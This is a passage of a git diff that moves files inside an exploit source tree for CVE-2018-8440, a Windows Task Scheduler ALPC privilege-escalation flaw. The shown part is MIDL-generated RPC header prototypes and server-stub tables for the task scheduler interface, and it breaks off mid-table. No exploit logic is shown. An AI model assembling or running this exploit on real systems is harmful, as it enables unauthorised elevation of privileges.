IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [string][unique][in] */ wchar_t *arg_2, - /* [in] */ long arg_3); - -long _SchRpcSetSecurity( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [string][in] */ wchar_t *arg_2, - /* [in] */ long arg_3); - -long _SchRpcGetSecurity( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [string][ref][out] */ wchar_t **arg_3); - -long _SchRpcEnumFolders( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [out][in] */ long *arg_3, - /* [in] */ long arg_4, - /* [out] */ long *arg_5, - /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6); - -long _SchRpcEnumTasks( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [out][in] */ long *arg_3, - /* [in] */ long arg_4, - /* [out] */ long *arg_5, - /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6); - -long _SchRpcEnumInstances( - /* [in] */ handle_t IDL_handle, - /* [string][unique][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [out] */ long *arg_3, - /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_4); - -long _SchRpcGetInstanceInfo( - /* [in] */ handle_t IDL_handle, - /* [in] */ struct Struct_144_t *arg_1, - /* [string][ref][out] */ wchar_t **arg_2, - /* [out] */ long *arg_3, - /* [string][ref][out] */ wchar_t **arg_4, - /* [string][ref][out] */ wchar_t **arg_5, - /* [out] */ long *arg_6, - /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_7, - /* [out] */ long *arg_8); - -long _SchRpcStopInstance( - /* [in] */ handle_t IDL_handle, - /* [in] */ struct Struct_144_t *arg_1, - /* [in] */ long arg_2); - -long _SchRpcStop( - /* [in] */ handle_t IDL_handle, - /* [string][unique][in] */ wchar_t *arg_1, - /* [in] */ long arg_2); - -long _SchRpcRun( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [string][size_is][unique][in] */ wchar_t **arg_3, - /* [in] */ long arg_4, - /* [in] */ long arg_5, - /* [string][unique][in] */ wchar_t *arg_6, - /* [out] */ struct Struct_144_t *arg_7); - -long _SchRpcDelete( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2); - -long _SchRpcRename( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [string][in] */ wchar_t *arg_2, - /* [in] */ long arg_3); - -long _SchRpcScheduledRuntimes( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [unique][in] */ struct Struct_246_t *arg_2, - /* [unique][in] */ struct Struct_246_t *arg_3, - /* [in] */ long arg_4, - /* [in] */ long arg_5, - /* [out] */ long *arg_6, - /* [size_is][size_is][ref][out] */ struct Struct_246_t **arg_7); - -long _SchRpcGetLastRunInfo( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [out] */ struct Struct_246_t *arg_2, - /* [out] */ long *arg_3); - -long _SchRpcGetTaskInfo( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [out] */ long *arg_3, - /* [out] */ long *arg_4); - -long _SchRpcGetNumberOfMissedRuns( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [out] */ long *arg_2); - -long _SchRpcEnableTask( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2); - - - -extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec; -extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec; -#endif /* __DefaultIfName_INTERFACE_DEFINED__ */ - -/* Additional Prototypes for ALL interfaces */ - -/* end of Additional Prototypes */ - -#ifdef __cplusplus -} -#endif - -#endif - - + + +/* this ALWAYS GENERATED file contains the definitions for the interfaces */ + + + /* File created by MIDL compiler version 8.00.0603 */ +/* at Mon Sep 17 17:16:17 2018 + */ +/* Compiler settings for rpc.idl: + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 + protocol : dce , ms_ext, c_ext, robust + error checks: allocation ref bounds_check enum stub_data + VC __declspec() decoration level: + __declspec(uuid()), __declspec(selectany), __declspec(novtable) + DECLSPEC_UUID(), MIDL_INTERFACE() +*/ +/* @@MIDL_FILE_HEADING( ) */ + +#pragma warning( disable: 4049 ) /* more than 64k source lines */ + + +/* verify that the version is high enough to compile this file*/ +#ifndef __REQUIRED_RPCNDR_H_VERSION__ +#define __REQUIRED_RPCNDR_H_VERSION__ 475 +#endif + +#include "rpc.h" +#include "rpcndr.h" + +#ifndef __RPCNDR_H_VERSION__ +#error this stub requires an updated version of +#endif // __RPCNDR_H_VERSION__ + + +#ifndef __rpc_h_h__ +#define __rpc_h_h__ + +#if defined(_MSC_VER) && (_MSC_VER >= 1020) +#pragma once +#endif + +/* Forward Declarations */ + +/* header files for imported files */ +#include "oaidl.h" +#include "ocidl.h" + +#ifdef __cplusplus +extern "C"{ +#endif + + +#ifndef __DefaultIfName_INTERFACE_DEFINED__ +#define __DefaultIfName_INTERFACE_DEFINED__ + +/* interface DefaultIfName */ +/* [version][uuid] */ + +typedef struct Struct_18_t + { + /* [string][unique] */ wchar_t *StructMember0; + /* [string][unique] */ wchar_t *StructMember1; + long StructMember2; + } Struct_18_t; + +typedef struct Struct_74_t + { + long StructMember0; + long StructMember1; + /* [string][unique] */ wchar_t *StructMember2; + /* [string][unique] */ wchar_t *StructMember3; + } Struct_74_t; + +typedef struct Struct_144_t + { + long StructMember0; + short StructMember1; + short StructMember2; + byte StructMember3[ 8 ]; + } Struct_144_t; + +typedef struct Struct_246_t + { + short StructMember0; + short StructMember1; + short StructMember2; + short StructMember3; + short StructMember4; + short StructMember5; + short StructMember6; + short StructMember7; + } Struct_246_t; + +long _SchRpcHighestVersion( + /* [in] */ handle_t IDL_handle, + /* [out] */ long *arg_1); + +long _SchRpcRegisterTask( + /* [in] */ handle_t IDL_handle, + /* [string][unique][in] */ wchar_t *arg_1, + /* [string][in] */ wchar_t *arg_2, + /* [in] */ long arg_3, + /* [string][unique][in] */ wchar_t *arg_4, + /* [in] */ long arg_5, + /* [in] */ long arg_6, + /* [size_is][unique][in] */ struct Struct_18_t *arg_7, + /* [string][ref][out] */ wchar_t **arg_8, + /* [ref][out] */ struct Struct_74_t **arg_9); + +long SchRpcRetrieveTask( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [string][in] */ wchar_t *arg_2, + /* [in] */ long *arg_3, + /* [string][ref][out] */ wchar_t **arg_4); + +long _SchRpcCreateFolder( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [string][unique][in] */ wchar_t *arg_2, + /* [in] */ long arg_3); + +long _SchRpcSetSecurity( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [string][in] */ wchar_t *arg_2, + /* [in] */ long arg_3); + +long _SchRpcGetSecurity( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [string][ref][out] */ wchar_t **arg_3); + +long _SchRpcEnumFolders( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [out][in] */ long *arg_3, + /* [in] */ long arg_4, + /* [out] */ long *arg_5, + /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6); + +long _SchRpcEnumTasks( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [out][in] */ long *arg_3, + /* [in] */ long arg_4, + /* [out] */ long *arg_5, + /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6); + +long _SchRpcEnumInstances( + /* [in] */ handle_t IDL_handle, + /* [string][unique][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [out] */ long *arg_3, + /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_4); + +long _SchRpcGetInstanceInfo( + /* [in] */ handle_t IDL_handle, + /* [in] */ struct Struct_144_t *arg_1, + /* [string][ref][out] */ wchar_t **arg_2, + /* [out] */ long *arg_3, + /* [string][ref][out] */ wchar_t **arg_4, + /* [string][ref][out] */ wchar_t **arg_5, + /* [out] */ long *arg_6, + /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_7, + /* [out] */ long *arg_8); + +long _SchRpcStopInstance( + /* [in] */ handle_t IDL_handle, + /* [in] */ struct Struct_144_t *arg_1, + /* [in] */ long arg_2); + +long _SchRpcStop( + /* [in] */ handle_t IDL_handle, + /* [string][unique][in] */ wchar_t *arg_1, + /* [in] */ long arg_2); + +long _SchRpcRun( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [string][size_is][unique][in] */ wchar_t **arg_3, + /* [in] */ long arg_4, + /* [in] */ long arg_5, + /* [string][unique][in] */ wchar_t *arg_6, + /* [out] */ struct Struct_144_t *arg_7); + +long _SchRpcDelete( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2); + +long _SchRpcRename( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [string][in] */ wchar_t *arg_2, + /* [in] */ long arg_3); + +long _SchRpcScheduledRuntimes( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [unique][in] */ struct Struct_246_t *arg_2, + /* [unique][in] */ struct Struct_246_t *arg_3, + /* [in] */ long arg_4, + /* [in] */ long arg_5, + /* [out] */ long *arg_6, + /* [size_is][size_is][ref][out] */ struct Struct_246_t **arg_7); + +long _SchRpcGetLastRunInfo( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [out] */ struct Struct_246_t *arg_2, + /* [out] */ long *arg_3); + +long _SchRpcGetTaskInfo( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2, + /* [out] */ long *arg_3, + /* [out] */ long *arg_4); + +long _SchRpcGetNumberOfMissedRuns( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [out] */ long *arg_2); + +long _SchRpcEnableTask( + /* [in] */ handle_t IDL_handle, + /* [string][in] */ wchar_t *arg_1, + /* [in] */ long arg_2); + + + +extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec; +extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec; +#endif /* __DefaultIfName_INTERFACE_DEFINED__ */ + +/* Additional Prototypes for ALL interfaces */ + +/* end of Additional Prototypes */ + +#ifdef __cplusplus +} +#endif + +#endif + + diff --git a/external/source/exploits/CVE-2018-8440/dll/src/rpc_s.c b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c similarity index 96% rename from external/source/exploits/CVE-2018-8440/dll/src/rpc_s.c rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c index 4a0c3bb2cf..a68166ee49 100755 --- a/external/source/exploits/CVE-2018-8440/dll/src/rpc_s.c +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c @@ -1,1611 +1,1611 @@ - - -/* this ALWAYS GENERATED file contains the RPC server stubs */ - - - /* File created by MIDL compiler version 8.00.0603 */ -/* at Fri Sep 14 13:09:25 2018 - */ -/* Compiler settings for rpc.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 - protocol : dce , ms_ext, c_ext, robust - error checks: allocation ref bounds_check enum stub_data - VC __declspec() decoration level: - __declspec(uuid()), __declspec(selectany), __declspec(novtable) - DECLSPEC_UUID(), MIDL_INTERFACE() -*/ -/* @@MIDL_FILE_HEADING( ) */ - -#if defined(_M_AMD64) - - -#pragma warning( disable: 4049 ) /* more than 64k source lines */ -#if _MSC_VER >= 1200 -#pragma warning(push) -#endif - -#pragma warning( disable: 4211 ) /* redefine extern to static */ -#pragma warning( disable: 4232 ) /* dllimport identity*/ -#pragma warning( disable: 4024 ) /* array to pointer mapping*/ - -#include -#include "rpc_h.h" - -#define TYPE_FORMAT_STRING_SIZE 295 -#define PROC_FORMAT_STRING_SIZE 1207 -#define EXPR_FORMAT_STRING_SIZE 1 -#define TRANSMIT_AS_TABLE_SIZE 0 -#define WIRE_MARSHAL_TABLE_SIZE 0 - -typedef struct _rpc_MIDL_TYPE_FORMAT_STRING - { - short Pad; - unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; - } rpc_MIDL_TYPE_FORMAT_STRING; - -typedef struct _rpc_MIDL_PROC_FORMAT_STRING - { - short Pad; - unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; - } rpc_MIDL_PROC_FORMAT_STRING; - -typedef struct _rpc_MIDL_EXPR_FORMAT_STRING - { - long Pad; - unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; - } rpc_MIDL_EXPR_FORMAT_STRING; - - -static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = -{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; - -extern const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString; -extern const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString; -extern const rpc_MIDL_EXPR_FORMAT_STRING rpc__MIDL_ExprFormatString; - -/* Standard interface: DefaultIfName, ver. 1.0, - GUID={0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}} */ - - -extern const MIDL_SERVER_INFO DefaultIfName_ServerInfo; - -extern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable; - -static const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface = - { - sizeof(RPC_SERVER_INTERFACE), - {{0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}},{1,0}}, - {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, - (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable, - 0, - 0, - 0, - &DefaultIfName_ServerInfo, - 0x04000000 - }; -RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface; - -extern const MIDL_STUB_DESC DefaultIfName_StubDesc; - - -#if !defined(__RPC_WIN64__) -#error Invalid build platform for this stub. -#endif - -static const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString = - { - 0, - { - - /* Procedure _SchRpcHighestVersion */ - - 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 2 */ NdrFcLong( 0x0 ), /* 0 */ -/* 6 */ NdrFcShort( 0x0 ), /* 0 */ -/* 8 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 14 */ NdrFcShort( 0x0 ), /* 0 */ -/* 16 */ NdrFcShort( 0x24 ), /* 36 */ -/* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */ - 0x2, /* 2 */ -/* 20 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 22 */ NdrFcShort( 0x0 ), /* 0 */ -/* 24 */ NdrFcShort( 0x0 ), /* 0 */ -/* 26 */ NdrFcShort( 0x0 ), /* 0 */ -/* 28 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 30 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 34 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_1 */ - -/* 36 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 40 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcRegisterTask */ - - - /* Return value */ - -/* 42 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 44 */ NdrFcLong( 0x0 ), /* 0 */ -/* 48 */ NdrFcShort( 0x1 ), /* 1 */ -/* 50 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ -/* 52 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 54 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 56 */ NdrFcShort( 0x18 ), /* 24 */ -/* 58 */ NdrFcShort( 0x8 ), /* 8 */ -/* 60 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0xa, /* 10 */ -/* 62 */ 0xa, /* 10 */ - 0x5, /* Ext Flags: new corr desc, srv corr check, */ -/* 64 */ NdrFcShort( 0x0 ), /* 0 */ -/* 66 */ NdrFcShort( 0x1 ), /* 1 */ -/* 68 */ NdrFcShort( 0x0 ), /* 0 */ -/* 70 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 72 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 74 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 76 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_1 */ - -/* 78 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 80 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 82 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_2 */ - -/* 84 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 86 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 88 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 90 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 92 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 94 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_4 */ - -/* 96 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 98 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 100 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 102 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 104 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 106 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_6 */ - -/* 108 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 110 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 112 */ NdrFcShort( 0xe ), /* Type Offset=14 */ - - /* Parameter arg_7 */ - -/* 114 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 116 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 118 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_8 */ - -/* 120 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 122 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ -/* 124 */ NdrFcShort( 0x42 ), /* Type Offset=66 */ - - /* Parameter arg_9 */ - -/* 126 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 128 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ -/* 130 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure SchRpcRetrieveTask */ - - - /* Return value */ - -/* 132 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 134 */ NdrFcLong( 0x0 ), /* 0 */ -/* 138 */ NdrFcShort( 0x2 ), /* 2 */ -/* 140 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 142 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 144 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 146 */ NdrFcShort( 0x1c ), /* 28 */ -/* 148 */ NdrFcShort( 0x8 ), /* 8 */ -/* 150 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x5, /* 5 */ -/* 152 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 154 */ NdrFcShort( 0x0 ), /* 0 */ -/* 156 */ NdrFcShort( 0x0 ), /* 0 */ -/* 158 */ NdrFcShort( 0x0 ), /* 0 */ -/* 160 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 162 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 164 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 166 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 168 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 170 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 172 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_2 */ - -/* 174 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ -/* 176 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 178 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 180 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 182 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 184 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_4 */ - -/* 186 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 188 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 190 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcCreateFolder */ - - - /* Return value */ - -/* 192 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 194 */ NdrFcLong( 0x0 ), /* 0 */ -/* 198 */ NdrFcShort( 0x3 ), /* 3 */ -/* 200 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 202 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 204 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 206 */ NdrFcShort( 0x8 ), /* 8 */ -/* 208 */ NdrFcShort( 0x8 ), /* 8 */ -/* 210 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 212 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 214 */ NdrFcShort( 0x0 ), /* 0 */ -/* 216 */ NdrFcShort( 0x0 ), /* 0 */ -/* 218 */ NdrFcShort( 0x0 ), /* 0 */ -/* 220 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 222 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 224 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 226 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 228 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 230 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 232 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_2 */ - -/* 234 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 236 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 238 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 240 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 242 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 244 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcSetSecurity */ - - - /* Return value */ - -/* 246 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 248 */ NdrFcLong( 0x0 ), /* 0 */ -/* 252 */ NdrFcShort( 0x4 ), /* 4 */ -/* 254 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 256 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 258 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 260 */ NdrFcShort( 0x8 ), /* 8 */ -/* 262 */ NdrFcShort( 0x8 ), /* 8 */ -/* 264 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 266 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 268 */ NdrFcShort( 0x0 ), /* 0 */ -/* 270 */ NdrFcShort( 0x0 ), /* 0 */ -/* 272 */ NdrFcShort( 0x0 ), /* 0 */ -/* 274 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 276 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 278 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 280 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 282 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 284 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 286 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_2 */ - -/* 288 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 290 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 292 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 294 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 296 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 298 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetSecurity */ - - - /* Return value */ - -/* 300 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 302 */ NdrFcLong( 0x0 ), /* 0 */ -/* 306 */ NdrFcShort( 0x5 ), /* 5 */ -/* 308 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 310 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 312 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 314 */ NdrFcShort( 0x8 ), /* 8 */ -/* 316 */ NdrFcShort( 0x8 ), /* 8 */ -/* 318 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 320 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 322 */ NdrFcShort( 0x0 ), /* 0 */ -/* 324 */ NdrFcShort( 0x0 ), /* 0 */ -/* 326 */ NdrFcShort( 0x0 ), /* 0 */ -/* 328 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 330 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 332 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 334 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 336 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 338 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 340 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 342 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 344 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 346 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_3 */ - -/* 348 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 350 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 352 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcEnumFolders */ - - - /* Return value */ - -/* 354 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 356 */ NdrFcLong( 0x0 ), /* 0 */ -/* 360 */ NdrFcShort( 0x6 ), /* 6 */ -/* 362 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 364 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 366 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 368 */ NdrFcShort( 0x2c ), /* 44 */ -/* 370 */ NdrFcShort( 0x40 ), /* 64 */ -/* 372 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x7, /* 7 */ -/* 374 */ 0xa, 